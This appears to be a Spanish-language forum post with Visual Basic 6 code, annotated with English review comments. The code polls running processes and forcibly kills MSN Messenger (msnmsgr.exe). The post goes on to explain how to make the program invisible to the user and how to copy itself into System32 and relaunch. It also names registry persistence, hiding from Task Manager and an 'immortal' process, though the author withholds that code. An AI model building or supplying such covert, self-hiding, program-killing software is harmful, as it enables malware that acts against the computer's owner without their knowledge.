Primero las funciones para buscar un proceso cada X milisegundos y si existe obtener el PID y Matarlo
' Win32 declarations for a Toolhelp32 process walk plus OpenProcess/TerminateProcess.
' NOTE(review): most APIs are declared twice, once under a short Alias (ProcessFirst,
' ProcessNext, CreateToolhelpSnapshot) and once under the real name; only the Alias
' forms are called by the visible code below.
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
' lProcessID is ByRef here but ByVal in the un-aliased declaration on the next line,
' so this form hands the API the address of the argument rather than its value.
' Presumably it still works because Windows ignores that parameter for TH32CS_SNAPPROCESS - confirm.
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Declared but never called in the visible code.
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
' Only the terminate right is requested from OpenProcess; no query/read access.
Private Const PROCESS_TERMINATE As Long = &H1
' Not referenced anywhere in the visible code.
Private Processes(150) As Long
' Mirrors the Win32 PROCESSENTRY32 layout; dwSize must be filled in before Process32First.
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
' Fixed 260-character (MAX_PATH) buffer; the executable name is NUL-terminated inside it.
szexeFile As String * 260
End Type
' PID of the last process matched by BuscarProcesoX, kept as text even though it is assigned from a Long.
Dim ProcesoXPID As String
'Busca una cadena (Nombre del ejecutable) para saber si esta en ejecucion.
' Walks the process list and reports whether any running executable name ends with ProcesoX.
' Side effect: stores the PID of the last match in the module-level ProcesoXPID.
' NOTE(review): the return type is String but True/False are assigned to it; the
' `= True` comparison in Timer1_Timer relies on VB's implicit coercion - confirm it behaves as intended.
Function BuscarProcesoX(ProcesoX As String) As String
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szProcesoX As String
' Never assigned (stays 0); the CloseHandle call on it below closes nothing.
Dim myProcess As Long
Dim i As Integer
' Every failure below (bad snapshot handle, Left$ with a negative length, ...) is silently ignored.
On Error Resume Next
Const TH32CS_SNAPPROCESS As Long = 2&
BuscarProcesoX = False
uProcess.dwSize = Len(uProcess)
' hSnapshot is not checked for failure before use.
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
' Trim the fixed buffer at its first NUL. If no NUL is found i is 0 and Left$ gets -1,
' which raises an error that On Error Resume Next swallows.
i = InStr(1, uProcess.szexeFile, Chr(0))
szProcesoX = LCase$(Left$(uProcess.szexeFile, i - 1))
' Suffix match, not an exact name match: any executable whose name ends with ProcesoX qualifies.
If Right$(szProcesoX, Len(ProcesoX)) = LCase$(ProcesoX) Then
BuscarProcesoX = True
Call CloseHandle(myProcess)
' No Exit Do: the loop keeps going, so with several matches the last PID wins.
ProcesoXPID = uProcess.th32ProcessID
End If
rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
End Function
'Mata el proceso pasandole el PID
' Forcibly ends the process whose PID is given as text. No return type is declared and
' nothing is assigned to the function, so the caller gets Empty regardless of outcome.
' TerminateProcess gives the target no chance to clean up; whatever it had unsaved is lost.
Function TerminarProcesoX(ProcesoX As String)
Dim ProcHandle As Long
' bInheritHandle = False; CLng raises a type error if ProcesoX is not numeric.
' OpenProcess returns 0 on failure (e.g. insufficient rights) and that is not checked.
ProcHandle = OpenProcess(PROCESS_TERMINATE, False, CLng(ProcesoX))
' Return values of both calls are discarded, so failures are invisible to the caller.
TerminateProcess ProcHandle, 0
CloseHandle ProcHandle
End Function
'Busca el proceso, si existe, lo mata
' Timer tick: look for the hard-coded executable name and end it if found.
' Depends on BuscarProcesoX having set the module-level ProcesoXPID as a side effect.
' The interval between checks is the Timer1 control's Interval property, set elsewhere.
Private Sub Timer1_Timer()
If BuscarProcesoX("msnmsgr.exe") = True Then
TerminarProcesoX ProcesoXPID
End If
End Sub
Dejar no visible nuestra aplicacion
Que el usuario no pueda verla
Appearance = 0-Flat
Caption = ""
ClipControls = False
ControlBox = False
Enabled = False
Hight = 1
MaxButton = False
MinButton = False
Moveable = False
NavigateMenus = False
ShowInTaskBar = False
Visible = False
Width = 1
Top = -9999
Left = -9999
Copiarse en System32, registro, ocultarse del TaskManager y hacer proceso "inmortal"
Como no voy a hacer apología a la programación de virus, no voy a mostrar ningún tipo de código en el foro público sobre estas funciones.
Copiarse en system32 es tan fácil como:
If app.path <> Get_System32Dir then
Copy app.path & "\MyName.exe", Get_System32Dir & "\MyName.exe"
Shell Get_System32Dir & "\MyName.exe"
Unload Me
End if
Function Get_System32Dir()
'A tu imaginacion
End Function
Copiarse en el registro:
Alguna vez he dejado alguna función por ahí que sencillamente, al ejecutarse y terminar, llama a la función asignándole el valor de la cadena del registro, usando módulo, no objetos.
Para ocultarse del TaskManager:
Deje un modulo por el foro hace poco
Para hacer proceso "inmortal":
Usen su imaginacion
*Ninguna función de infección, ni hook, ni packer ni nada parecido; es innecesario.